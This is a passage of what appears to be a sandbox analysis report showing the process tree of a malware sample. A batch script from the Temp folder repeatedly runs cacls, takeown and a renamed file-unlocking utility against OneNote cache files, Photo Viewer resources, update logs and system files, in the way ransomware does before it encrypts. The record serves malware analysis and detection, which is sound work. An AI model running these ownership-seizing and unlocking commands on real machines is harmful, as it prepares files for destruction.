  - - C:\Users\Admin\AppData\Local\Temp\SjGmrQ0e.exe
      SjGmrQ0e.exe -accepteula "0000000M.bin" -nobanner
      4⤵
      System Location Discovery: System Language Discovery
      PID:4704
- - C:\Users\Admin\AppData\Local\Temp\SjGmrQ0e.exe
    SjGmrQ0e.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    - System Location Discovery: System Language Discovery
    PID:5952
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\HSy2cokG.bat" "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\00000010.bin""
  2⤵
  PID:6680
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\00000010.bin" /E /G Admin:F /C
    3⤵
    PID:6896
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\00000010.bin"
    3⤵
    PID:6584
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c SjGmrQ0e.exe -accepteula "00000010.bin" -nobanner
    3⤵
    - System Location Discovery: System Language Discovery
    PID:5832
  - - C:\Users\Admin\AppData\Local\Temp\SjGmrQ0e.exe
      SjGmrQ0e.exe -accepteula "00000010.bin" -nobanner
      4⤵
      PID:7416
- - C:\Users\Admin\AppData\Local\Temp\SjGmrQ0e.exe
    SjGmrQ0e.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:6800
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\HSy2cokG.bat" "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\00000054.bin""
  2⤵
  PID:6956
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\00000054.bin" /E /G Admin:F /C
    3⤵
    PID:6692
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\00000054.bin"
    3⤵
    PID:6748
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c SjGmrQ0e.exe -accepteula "00000054.bin" -nobanner
    3⤵
    PID:6020
  - - C:\Users\Admin\AppData\Local\Temp\SjGmrQ0e.exe
      SjGmrQ0e.exe -accepteula "00000054.bin" -nobanner
      4⤵
      PID:6888
- - C:\Users\Admin\AppData\Local\Temp\SjGmrQ0e.exe
    SjGmrQ0e.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:2188
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\HSy2cokG.bat" "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\00000070.bin""
  2⤵
  PID:6224
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\00000070.bin" /E /G Admin:F /C
    3⤵
    PID:4868
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\00000070.bin"
    3⤵
    - Modifies file permissions
    PID:4364
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c SjGmrQ0e.exe -accepteula "00000070.bin" -nobanner
    3⤵
    PID:5956
  - - C:\Users\Admin\AppData\Local\Temp\SjGmrQ0e.exe
      SjGmrQ0e.exe -accepteula "00000070.bin" -nobanner
      4⤵
      PID:5932
- - C:\Users\Admin\AppData\Local\Temp\SjGmrQ0e.exe
    SjGmrQ0e.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:6712
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\HSy2cokG.bat" "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\0000007A.bin""
  2⤵
  PID:2344
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\0000007A.bin" /E /G Admin:F /C
    3⤵
    PID:5348
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\0000007A.bin"
    3⤵
    PID:4632
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c SjGmrQ0e.exe -accepteula "0000007A.bin" -nobanner
    3⤵
    PID:4448
  - - C:\Users\Admin\AppData\Local\Temp\SjGmrQ0e.exe
      SjGmrQ0e.exe -accepteula "0000007A.bin" -nobanner
      4⤵
      PID:2036
- - C:\Users\Admin\AppData\Local\Temp\SjGmrQ0e.exe
    SjGmrQ0e.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:404
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\HSy2cokG.bat" "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\0000007K.bin""
  2⤵
  PID:1976
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\0000007K.bin" /E /G Admin:F /C
    3⤵
    PID:3456
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\0000007K.bin"
    3⤵
    - Modifies file permissions
    PID:6100
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c SjGmrQ0e.exe -accepteula "0000007K.bin" -nobanner
    3⤵
    PID:6176
  - - C:\Users\Admin\AppData\Local\Temp\SjGmrQ0e.exe
      SjGmrQ0e.exe -accepteula "0000007K.bin" -nobanner
      4⤵
      PID:5544
- - C:\Users\Admin\AppData\Local\Temp\SjGmrQ0e.exe
    SjGmrQ0e.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:6040
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\HSy2cokG.bat" "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\0000008J.bin""
  2⤵
  PID:6148
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\0000008J.bin" /E /G Admin:F /C
    3⤵
    PID:4508
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\0000008J.bin"
    3⤵
    - Modifies file permissions
    PID:3256
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c SjGmrQ0e.exe -accepteula "0000008J.bin" -nobanner
    3⤵
    PID:2520
  - - C:\Users\Admin\AppData\Local\Temp\SjGmrQ0e.exe
      SjGmrQ0e.exe -accepteula "0000008J.bin" -nobanner
      4⤵
      PID:3364
- - C:\Users\Admin\AppData\Local\Temp\SjGmrQ0e.exe
    SjGmrQ0e.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:1064
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\HSy2cokG.bat" "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\0000008V.bin""
  2⤵
  PID:4604
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\0000008V.bin" /E /G Admin:F /C
    3⤵
    PID:4832
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\0000008V.bin"
    3⤵
    PID:4012
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c SjGmrQ0e.exe -accepteula "0000008V.bin" -nobanner
    3⤵
    PID:6152
  - - C:\Users\Admin\AppData\Local\Temp\SjGmrQ0e.exe
      SjGmrQ0e.exe -accepteula "0000008V.bin" -nobanner
      4⤵
      System Location Discovery: System Language Discovery
      PID:1060
- - C:\Users\Admin\AppData\Local\Temp\SjGmrQ0e.exe
    SjGmrQ0e.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:1656
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\HSy2cokG.bat" "C:\Program Files (x86)\Windows Photo Viewer\de-DE\ImagingDevices.exe.mui""
  2⤵
  PID:6500
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Windows Photo Viewer\de-DE\ImagingDevices.exe.mui" /E /G Admin:F /C
    3⤵
    PID:7404
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Windows Photo Viewer\de-DE\ImagingDevices.exe.mui"
    3⤵
    - Modifies file permissions
    PID:6196
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c SjGmrQ0e.exe -accepteula "ImagingDevices.exe.mui" -nobanner
    3⤵
    PID:6316
  - - C:\Users\Admin\AppData\Local\Temp\SjGmrQ0e.exe
      SjGmrQ0e.exe -accepteula "ImagingDevices.exe.mui" -nobanner
      4⤵
      PID:6592
- - C:\Users\Admin\AppData\Local\Temp\SjGmrQ0e.exe
    SjGmrQ0e.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:6516
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\HSy2cokG.bat" "C:\Program Files (x86)\Windows Photo Viewer\fr-FR\PhotoAcq.dll.mui""
  2⤵
  PID:7276
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Windows Photo Viewer\fr-FR\PhotoAcq.dll.mui" /E /G Admin:F /C
    3⤵
    PID:7292
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Windows Photo Viewer\fr-FR\PhotoAcq.dll.mui"
    3⤵
    PID:6536
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c SjGmrQ0e.exe -accepteula "PhotoAcq.dll.mui" -nobanner
    3⤵
    PID:5672
  - - C:\Users\Admin\AppData\Local\Temp\SjGmrQ0e.exe
      SjGmrQ0e.exe -accepteula "PhotoAcq.dll.mui" -nobanner
      4⤵
      System Location Discovery: System Language Discovery
      PID:6184
- - C:\Users\Admin\AppData\Local\Temp\SjGmrQ0e.exe
    SjGmrQ0e.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:4992
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\HSy2cokG.bat" "C:\Program Files (x86)\Windows Photo Viewer\uk-UA\PhotoAcq.dll.mui""
  2⤵
  - System Location Discovery: System Language Discovery
  PID:5344
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Windows Photo Viewer\uk-UA\PhotoAcq.dll.mui" /E /G Admin:F /C
    3⤵
    PID:6388
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Windows Photo Viewer\uk-UA\PhotoAcq.dll.mui"
    3⤵
    PID:6644
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c SjGmrQ0e.exe -accepteula "PhotoAcq.dll.mui" -nobanner
    3⤵
    PID:6532
  - - C:\Users\Admin\AppData\Local\Temp\SjGmrQ0e.exe
      SjGmrQ0e.exe -accepteula "PhotoAcq.dll.mui" -nobanner
      4⤵
      PID:5616
- - C:\Users\Admin\AppData\Local\Temp\SjGmrQ0e.exe
    SjGmrQ0e.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:5652
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\HSy2cokG.bat" "C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\Settings\settings.dat""
  2⤵
  PID:5692
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\Settings\settings.dat" /E /G Admin:F /C
    3⤵
    PID:1172
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\Settings\settings.dat"
    3⤵
    - Modifies file permissions
    PID:212
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c SjGmrQ0e.exe -accepteula "settings.dat" -nobanner
    3⤵
    PID:6248
  - - C:\Users\Admin\AppData\Local\Temp\SjGmrQ0e.exe
      SjGmrQ0e.exe -accepteula "settings.dat" -nobanner
      4⤵
      PID:7468
- - C:\Users\Admin\AppData\Local\Temp\SjGmrQ0e.exe
    SjGmrQ0e.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:7108
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\HSy2cokG.bat" "C:\Program Files\Windows Photo Viewer\en-US\PhotoViewer.dll.mui""
  2⤵
  PID:6604
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files\Windows Photo Viewer\en-US\PhotoViewer.dll.mui" /E /G Admin:F /C
    3⤵
    PID:6276
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files\Windows Photo Viewer\en-US\PhotoViewer.dll.mui"
    3⤵
    - Modifies file permissions
    PID:7152
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c SjGmrQ0e.exe -accepteula "PhotoViewer.dll.mui" -nobanner
    3⤵
    PID:6464
  - - C:\Users\Admin\AppData\Local\Temp\SjGmrQ0e.exe
      SjGmrQ0e.exe -accepteula "PhotoViewer.dll.mui" -nobanner
      4⤵
      PID:3240
- - C:\Users\Admin\AppData\Local\Temp\SjGmrQ0e.exe
    SjGmrQ0e.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:4972
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\HSy2cokG.bat" "C:\Program Files\Windows Photo Viewer\it-IT\PhotoViewer.dll.mui""
  2⤵
  PID:7016
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files\Windows Photo Viewer\it-IT\PhotoViewer.dll.mui" /E /G Admin:F /C
    3⤵
    PID:5312
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files\Windows Photo Viewer\it-IT\PhotoViewer.dll.mui"
    3⤵
    PID:7328
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c SjGmrQ0e.exe -accepteula "PhotoViewer.dll.mui" -nobanner
    3⤵
    PID:6228
  - - C:\Users\Admin\AppData\Local\Temp\SjGmrQ0e.exe
      SjGmrQ0e.exe -accepteula "PhotoViewer.dll.mui" -nobanner
      4⤵
      PID:6468
- - C:\Users\Admin\AppData\Local\Temp\SjGmrQ0e.exe
    SjGmrQ0e.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:6900
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\HSy2cokG.bat" "C:\Users\All Users\USOPrivate\UpdateStore\store.db""
  2⤵
  PID:7576
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Users\All Users\USOPrivate\UpdateStore\store.db" /E /G Admin:F /C
    3⤵
    PID:7408
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Users\All Users\USOPrivate\UpdateStore\store.db"
    3⤵
    PID:7704
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c SjGmrQ0e.exe -accepteula "store.db" -nobanner
    3⤵
    PID:7396
  - - C:\Users\Admin\AppData\Local\Temp\SjGmrQ0e.exe
      SjGmrQ0e.exe -accepteula "store.db" -nobanner
      4⤵
      PID:6716
- - C:\Users\Admin\AppData\Local\Temp\SjGmrQ0e.exe
    SjGmrQ0e.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:6720
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\HSy2cokG.bat" "C:\ProgramData\USOShared\Logs\System\MoUsoCoreWorker.82959552-c42e-4665-aa70-97a25d968e65.1.etl""
  2⤵
  PID:7280
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\ProgramData\USOShared\Logs\System\MoUsoCoreWorker.82959552-c42e-4665-aa70-97a25d968e65.1.etl" /E /G Admin:F /C
    3⤵
    PID:6968
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\ProgramData\USOShared\Logs\System\MoUsoCoreWorker.82959552-c42e-4665-aa70-97a25d968e65.1.etl"
    3⤵
    PID:6768
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c SjGmrQ0e.exe -accepteula "MoUsoCoreWorker.82959552-c42e-4665-aa70-97a25d968e65.1.etl" -nobanner
    3⤵
    PID:7308
  - - C:\Users\Admin\AppData\Local\Temp\SjGmrQ0e.exe
      SjGmrQ0e.exe -accepteula "MoUsoCoreWorker.82959552-c42e-4665-aa70-97a25d968e65.1.etl" -nobanner
      4⤵
      PID:5364
- - C:\Users\Admin\AppData\Local\Temp\SjGmrQ0e.exe
    SjGmrQ0e.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:6436
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\HSy2cokG.bat" "C:\ProgramData\USOShared\Logs\System\MoUsoCoreWorker.5197f22c-1aea-4cfe-90cb-ef980d0fcd3f.1.etl""
  2⤵
  PID:7660
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\ProgramData\USOShared\Logs\System\MoUsoCoreWorker.5197f22c-1aea-4cfe-90cb-ef980d0fcd3f.1.etl" /E /G Admin:F /C
    3⤵
    PID:4144
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\ProgramData\USOShared\Logs\System\MoUsoCoreWorker.5197f22c-1aea-4cfe-90cb-ef980d0fcd3f.1.etl"
    3⤵
    PID:7556
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c SjGmrQ0e.exe -accepteula "MoUsoCoreWorker.5197f22c-1aea-4cfe-90cb-ef980d0fcd3f.1.etl" -nobanner
    3⤵
    PID:6760
  - - C:\Users\Admin\AppData\Local\Temp\SjGmrQ0e.exe
      SjGmrQ0e.exe -accepteula "MoUsoCoreWorker.5197f22c-1aea-4cfe-90cb-ef980d0fcd3f.1.etl" -nobanner
      4⤵
      PID:6332
- - C:\Users\Admin\AppData\Local\Temp\SjGmrQ0e.exe
    SjGmrQ0e.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:5756
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\HSy2cokG.bat" "C:\ProgramData\USOShared\Logs\System\WuProvider.d26641b7-93cd-43c5-bb27-4afeb663ba6d.1.etl""
  2⤵
  PID:7988
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\ProgramData\USOShared\Logs\System\WuProvider.d26641b7-93cd-43c5-bb27-4afeb663ba6d.1.etl" /E /G Admin:F /C
    3⤵
    PID:7724
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\ProgramData\USOShared\Logs\System\WuProvider.d26641b7-93cd-43c5-bb27-4afeb663ba6d.1.etl"
    3⤵
    PID:6552
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c SjGmrQ0e.exe -accepteula "WuProvider.d26641b7-93cd-43c5-bb27-4afeb663ba6d.1.etl" -nobanner
    3⤵
    PID:8020
  - - C:\Users\Admin\AppData\Local\Temp\SjGmrQ0e.exe
      SjGmrQ0e.exe -accepteula "WuProvider.d26641b7-93cd-43c5-bb27-4afeb663ba6d.1.etl" -nobanner
      4⤵
      PID:7240
- - C:\Users\Admin\AppData\Local\Temp\SjGmrQ0e.exe
    SjGmrQ0e.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:6408
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\HSy2cokG.bat" "C:\DDF.sys""
  2⤵
  PID:7784
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\DDF.sys" /E /G Admin:F /C
    3⤵
    PID:7484
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\DDF.sys"
    3⤵
    - Modifies file permissions
    PID:292
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c SjGmrQ0e.exe -accepteula "DDF.sys" -nobanner
    3⤵
    PID:7880
  - - C:\Users\Admin\AppData\Local\Temp\SjGmrQ0e.exe
      SjGmrQ0e.exe -accepteula "DDF.sys" -nobanner
      4⤵
      PID:7692
- - C:\Users\Admin\AppData\Local\Temp\SjGmrQ0e.exe
    SjGmrQ0e.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:5300
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\HSy2cokG.bat" "C:\Program Files (x86)\Windows Photo Viewer\de-DE\PhotoViewer.dll.mui""
  2⤵
  PID:6904
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Windows Photo Viewer\de-DE\PhotoViewer.dll.mui" /E /G Admin:F /C
    3⤵
    PID:3328
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Windows Photo Viewer\de-DE\PhotoViewer.dll.mui"
    3⤵
    - Modifies file permissions
    PID:7820
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c SjGmrQ0e.exe -accepteula "PhotoViewer.dll.mui" -nobanner
    3⤵
    PID:5352
  - - C:\Users\Admin\AppData\Local\Temp\SjGmrQ0e.exe
      SjGmrQ0e.exe -accepteula "PhotoViewer.dll.mui" -nobanner
      4⤵
      PID:8100
- - C:\Users\Admin\AppData\Local\Temp\SjGmrQ0e.exe
    SjGmrQ0e.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:812
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\HSy2cokG.bat" "C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe""
  2⤵
  PID:6908
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe" /E /G Admin:F /C
    3⤵
    PID:2180
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe"
    3⤵
    PID:4464
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c SjGmrQ0e.exe -accepteula "ImagingDevices.exe" -nobanner
    3⤵
    PID:5164
  - - C:\Users\Admin\AppData\Local\Temp\SjGmrQ0e.exe
      SjGmrQ0e.exe -accepteula "ImagingDevices.exe" -nobanner
      4⤵
      PID:5212
- - C:\Users\Admin\AppData\Local\Temp\SjGmrQ0e.exe
    SjGmrQ0e.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:5152
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\HSy2cokG.bat" "C:\Users\All Users\Microsoft\Device Stage\Device\{8702d817-5aad-4674-9ef3-4d3decd87120}\background.png""
  2⤵
  PID:5284
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Users\All Users\Microsoft\Device Stage\Device\{8702d817-5aad-4674-9ef3-4d3decd87120}\background.png" /E /G Admin:F /C
    3⤵
    PID:5476
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Users\All Users\Microsoft\Device Stage\Device\{8702d817-5aad-4674-9ef3-4d3decd87120}\background.png"
    3⤵
    PID:4960
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c SjGmrQ0e.exe -accepteula "background.png" -nobanner
    3⤵
    PID:5204
  - - C:\Users\Admin\AppData\Local\Temp\SjGmrQ0e.exe
      SjGmrQ0e.exe -accepteula "background.png" -nobanner
      4⤵
      PID:5216
- - C:\Users\Admin\AppData\Local\Temp\SjGmrQ0e.exe
    SjGmrQ0e.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:6304
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\HSy2cokG.bat" "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\0000000D.bin""
  2⤵
  PID:5420
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\0000000D.bin" /E /G Admin:F /C
    3⤵
    PID:6652
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\0000000D.bin"
    3⤵
    PID:6892
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c SjGmrQ0e.exe -accepteula "0000000D.bin" -nobanner
    3⤵
    - System Location Discovery: System Language Discovery
    PID:7904
  - - C:\Users\Admin\AppData\Local\Temp\SjGmrQ0e.exe
      SjGmrQ0e.exe -accepteula "0000000D.bin" -nobanner
      4⤵
      PID:3536
- - C:\Users\Admin\AppData\Local\Temp\SjGmrQ0e.exe
    SjGmrQ0e.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:6688
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\HSy2cokG.bat" "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\0000000P.bin""
  2⤵
  PID:5588
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\0000000P.bin" /E /G Admin:F /C
    3⤵
    PID:3568
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\0000000P.bin"
    3⤵
    PID:6804
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c SjGmrQ0e.exe -accepteula "0000000P.bin" -nobanner
    3⤵
    PID:5576
  - - C:\Users\Admin\AppData\Local\Temp\SjGmrQ0e.exe
      SjGmrQ0e.exe -accepteula "0000000P.bin" -nobanner
      4⤵
      PID:668
- - C:\Users\Admin\AppData\Local\Temp\SjGmrQ0e.exe
    SjGmrQ0e.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:6312
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\HSy2cokG.bat" "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\00000013.bin""
  2⤵
  PID:6748
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\00000013.bin" /E /G Admin:F /C
    3⤵
    PID:5888
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\00000013.bin"
    3⤵
    PID:5800
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c SjGmrQ0e.exe -accepteula "00000013.bin" -nobanner
    3⤵
    PID:6828
  - - C:\Users\Admin\AppData\Local\Temp\SjGmrQ0e.exe
      SjGmrQ0e.exe -accepteula "00000013.bin" -nobanner
      4⤵
      PID:6136
- - C:\Users\Admin\AppData\Local\Temp\SjGmrQ0e.exe
    SjGmrQ0e.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:5896
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\HSy2cokG.bat" "C:\ProgramData\USOShared\Logs\System\MoUsoCoreWorker.f4ed466c-6388-46f0-a7a5-5a8359d9cc1d.1.etl""
  2⤵
  PID:4004
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\ProgramData\USOShared\Logs\System\MoUsoCoreWorker.f4ed466c-6388-46f0-a7a5-5a8359d9cc1d.1.etl" /E /G Admin:F /C
    3⤵
    PID:5764
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\ProgramData\USOShared\Logs\System\MoUsoCoreWorker.f4ed466c-6388-46f0-a7a5-5a8359d9cc1d.1.etl"
    3⤵
    PID:3784
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c SjGmrQ0e.exe -accepteula "MoUsoCoreWorker.f4ed466c-6388-46f0-a7a5-5a8359d9cc1d.1.etl" -nobanner
    3⤵
    PID:2956
  - - C:\Users\Admin\AppData\Local\Temp\SjGmrQ0e.exe
      SjGmrQ0e.exe -accepteula "MoUsoCoreWorker.f4ed466c-6388-46f0-a7a5-5a8359d9cc1d.1.etl" -nobanner
      4⤵
      PID:5452
